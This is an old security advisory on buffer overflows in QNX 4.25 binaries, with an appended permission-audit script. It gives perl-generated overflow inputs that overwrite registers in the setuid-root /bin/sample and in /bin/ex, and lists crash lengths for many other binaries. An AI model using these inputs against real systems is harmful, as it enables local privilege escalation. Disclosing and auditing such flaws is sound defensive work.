QNX: multiple buffer overflows in suid/non-suid files
17th Jun 2002 [SBWID-5459]
COMMAND

	QNX: multiple buffer overflows in suid/non-suid files

SYSTEMS AFFECTED

	QNX OS 4.25

PROBLEM

	Egor Egorov found the following binaries to be vulnerable to buffer
	overflows:

	/bin/sample

	 Example :
	 =========

	# cd /bin
	# ls -l sample
	-rwsrwxr-x  1 root      root          20639 Jan 19  1996 sample
	# sample `perl -e 'print "A" x 280'`
	Profile based upon 2000 samples/second.

	//1/bin/sample terminated (SIGSEGV) at 0005:00000041
	%1  672  Memory fault      sample $(perl -e 'print "A" x 280')

	# wd sample `perl -e 'print "A" x 280'`
	ebp: 41414141
	eip: 00000041

	# wd sample `perl -e 'print "A" x 280, "B"'`
	ebp: 41414141
	eip: 00004241

	/bin/ex

	 Example :
	 =========

	# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
	ebp: 00000041
	eip: 646f6f67 - doog

	And also :

	 file       bytes for bof

	/bin/du       - 558
	/bin/find     - 799
	/bin/lex      - 1673
	/bin/mkdir    - 517
	/bin/rm       - 351
	/bin/serserv  - 224
	/bin/tcpserv  - 146
	/bin/termdef  - 729
	/bin/time     - 2489
	/bin/unzip    - 299
	/bin/use      - 1964
	/bin/wcc      - 138
	/bin/wcc386   - 137
	/bin/wd       -
	/bin/wdisasm  - 135
	/bin/which    - 304
	/bin/wlib     - 256
	/bin/wlink    - 10244
	/bin/wpp      - 256
	/bin/wpp386   - 256
	/bin/wprof    - 141
	/bin/write    - 157
	/bin/wstrip   - 817

SOLUTION

	Update ?
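
	An overflow in one of these binaries crosses a privilege boundary only where the file is setuid or setgid, as /bin/sample is in the listing above (-rwsrwxr-x, owned by root and group-writable). The shell script below is an added example, not part of the original advisory: it reports the permission class of each listed binary found in a directory. The labels and function names are its own, and it assumes the usual POSIX `ls -l` column order.

```shell
#!/bin/sh
# Added example: permission triage for the binaries named in the advisory.
# Binary names come from the advisory; labels and function names are this
# example's own. Assumes POSIX `ls -l` columns (mode, links, owner, ...).

ADVISORY_BINS="sample ex du find lex mkdir rm serserv tcpserv termdef time
unzip use wcc wcc386 wd wdisasm which wlib wlink wpp wpp386 wprof write wstrip"

# classify_mode MODE OWNER: print a risk label for an `ls -l` mode string.
classify_mode() {
    mode=$1; owner=$2
    u_x=$(printf '%s' "$mode" | cut -c4)   # user-exec slot: s/S means setuid
    g_w=$(printf '%s' "$mode" | cut -c6)   # group-write slot
    g_x=$(printf '%s' "$mode" | cut -c7)   # group-exec slot: s/S means setgid
    o_w=$(printf '%s' "$mode" | cut -c9)   # other-write slot
    case $u_x in
        s|S)
            if [ "$owner" != root ]; then
                echo "SUID"
            elif [ "$g_w" = w ] || [ "$o_w" = w ]; then
                # setuid root and writable by group or others,
                # as /bin/sample is in the advisory's listing
                echo "SUID-ROOT-WRITABLE"
            else
                echo "SUID-ROOT"
            fi
            return ;;
    esac
    case $g_x in
        s|S) echo "SGID" ;;
        *)   echo "plain" ;;
    esac
}

# audit_bins DIR: print "label path" for each advisory binary found in DIR.
audit_bins() {
    dir=$1
    for name in $ADVISORY_BINS; do
        f=$dir/$name
        [ -f "$f" ] || continue
        set -- $(ls -ldL "$f")             # $1 = mode string, $3 = owner
        echo "$(classify_mode "$1" "$3") $f"
    done
}

# Default to /bin, where the advisory found the binaries.
audit_bins "${1:-/bin}"
```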
